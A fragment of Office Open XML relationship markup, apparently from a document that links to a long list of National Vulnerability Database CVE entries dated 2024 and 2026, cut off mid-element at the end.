Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18747" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80359" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93000" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58386" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101040" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101277" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101279" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101914" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102275" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102296" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102365" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102373" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18417" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19444" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82385" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82915" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84744" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93537" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93540" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94283" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96740" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82930" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89303" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101102" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101105" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101142" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101144" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101202" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101203" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101204" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101205" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101911" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101912" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101913" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102414" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18415" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82929" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86335" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92103" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94194" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102332" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102333" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102372" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102374" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82382" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82546" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86507" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87752" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91204" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91206" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82933" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102274" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18746" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82936" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87798" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97029" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15953" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70413" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94282" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101005" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101013" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101014" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101016" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101017" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101035" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101052" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101053" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101055" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101068" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101069" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102005" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102006" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94284" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94287" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97686" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101093" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101100" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101859" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102261" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102364" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102367" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82381" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82387" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82969" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88828" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93539" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100753" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101003" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101054" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101070" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101082" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101092" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101098" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101101" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101109" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101111" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101917" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101918" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102265" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102277" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102362" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18825" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52749" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55156" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82932" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86838" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89300" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89411" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92996" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73641" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80358" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94285" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102269" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7170" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7171" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7172" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100370" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101018" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101858" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102263" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59563" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102270" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102366" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101006" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101099" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101143" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101145" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101146" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101278" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102244" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102297" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13018" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86334" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101861" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82326" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97026" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101333" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101915" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102363" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18416" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97399" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97027" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101141" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102264" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102290" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101131" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97025" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101132" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101265" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102279" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101079" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102241" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101071" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101010" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101011" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101139" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101036" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101078" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101080" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100701" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101062" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101895" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10601" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12249" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32599" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 